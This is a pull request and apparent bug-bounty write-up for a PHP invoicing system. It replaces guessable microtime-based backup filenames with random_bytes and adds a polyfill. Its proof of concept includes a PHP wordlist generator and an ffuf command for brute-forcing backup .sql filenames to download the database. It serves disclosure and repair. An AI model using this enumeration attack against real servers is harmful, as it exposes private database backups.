### PR TITLE
introduced random_bytes for secure random generation.

### DIFF
--- a/app/admin/incFunctions.php
+++ b/app/admin/incFunctions.php
@@ -2294,3 +2294,29 @@ ORDER BY `date` DESC LIMIT 1',
 
 		return rtrim($dir, '\\/') . '/';
 	}
+	#########################################################
+
+	// Proposing the a wrapper function on /usr/bin/openssl in case the random_bytes function does not exists
+	if(!function_exists('random_bytes')) {
+		if(!function_exists('openssl_random_pseudo_bytes')) {
+			if(file_exists('/usr/bin/openssl')) {
+			    function random_bytes($length) {
+			        $length_n = (int) $length; // shell injection is no fun
+			        $handle = popen("/usr/bin/openssl rand $length_n", "r");
+			        $data = stream_get_contents($handle);
+			        pclose($handle);
+			        return $data;
+			    }
+			} else {
+				throw new \Exception("random_bytes does not exist and OpenSSL is not installed.");
+			}
+		} else {
+			function random_bytes($length) {
+				return openssl_random_pseudo_bytes($length);
+			}
+		}
+	}
+
+	if(!function_exists('random_bytes')) {
+		throw new \Exception("random_bytes function not available", 1);
+	}

--- a/app/admin/pageBackupRestore.php
+++ b/app/admin/pageBackupRestore.php
@@ -388,7 +388,7 @@
 			$config = ['dbServer' => '', 'dbUsername' => '', 'dbPassword' => '', 'dbDatabase' => ''];
 			foreach($config as $k => $v) $config[$k] = escapeshellarg(config($k));
 
-			$dump_file = escapeshellarg(normalize_path($this->curr_dir)) . '/backups/' . md5(microtime()) . '.sql';
+			$dump_file = escapeshellarg(normalize_path($this->curr_dir)) . '/backups/' . md5(random_bytes(16)) . '.sql';
 			$pass_param = ($config['dbPassword'] ? "-p{$config['dbPassword']}" : '');
 			$this->cmd = "(mysqldump --no-tablespaces -u{$config['dbUsername']} {$pass_param} -h{$config['dbServer']} {$config['dbDatabase']} -r {$dump_file}) 2>&1";
 


### PR DESCRIPTION
### 📊 Metadata *

_Please enter the direct URL for this bounty on huntr.dev. This is compulsory and will help us process your bounty submission quicker._

#### Bounty URL: https://www.huntr.dev/bounties/6-other-online-invoicing-system/

### ⚙️ Description *

A brute force attack uses trial-and-error to guess login info, encryption keys, or find a hidden web page. Attacker work through all possible combinations hoping to guess correctly. After a lot of trials, an attacker can find the filename and download the whole database backup.

### 💻 Technical Description *

Weak randomization for a filename can allow an attacker to bruteforce the filename by enumerating all possible MD5 hashes of `microtime()`. This fix introduces the use of random_bytes to generate pseudo random bytes and also provides a polyfill for the function. Use of pseudo random bytes are not guessable and cannot be enumerated. 

### 🐛 Proof of Concept (PoC) *

The exploit is hard and resource consuming. This can take several hours to days to months for a successful hit.

The following script generates the wordlist for bruteforcing. It is not a good wordlist as it tries to generate every possible MD5 that can go thousands times millions but it explains the concept of how enumeration can be done:

```php
<?php

(isset($argv[1]) && isset($argv[2])) or exit(1);

$from = is_numeric($argv[1]) ? (int) $argv[1] : strtotime($argv[1]);

$to = is_numeric($argv[2]) ? (int) $argv[2] : strtotime($argv[2]);

if($from && $to) {
    for($i = $from; $i <= $to; $i++) {
        for($j = 0; $j < 1; $j += 0.00000001) {
            $microseconds = round($j, 8);
            echo md5(sprintf("%'01.8f ", $microseconds).$i)."\n";
        }
    }
} else {
    exit(1);
}
```

Usage:

```bash
$ php generateWordlist.php "yesterday" "now" > wordlist.txt
```

After generating the wordlist, use any bruteforcer like [ffuf](https://github.com/ffuf/ffuf) to bruteforce the web application:

```bash
$ ffuf -w wordlist.txt -u "http://localhost/app/admin/backups/FUZZ.sql"
```

Given the wordlist can go as big as millions of lines, it can take a long time to complete. With the right resources and a good strategy (ie. knowing when the admin creates backup) it is possible to guess the filename and download the backup.

### 🔥 Proof of Fix (PoF) *

Since the filename is now generated by `random_bytes`, it is not possible to enumerate the filename.

### 👍 User Acceptance Testing (UAT)
* Manually tested the backup functionality, restoration and deletion. 
* Tested on PHP 5.6 as well as PHP 8
* In PHP 7+, the `random_bytes` function should be available. In case it is not available, polyfill tries to utilize `openssl_random_pseudo_bytes`. In rare cases when even `openssl_random_pseudo_bytes` is not available, it will try to use  the openssl binary residing at `/usr/bin/openssl`. This is quite rare as most servers have support for `openssl_random_pseudo_bytes`. In case open_basedir restriction is in effect, PHP probably won't have access to `/usr/bin/openssl` and polyfill will throw an exception. But this is quite a rare case.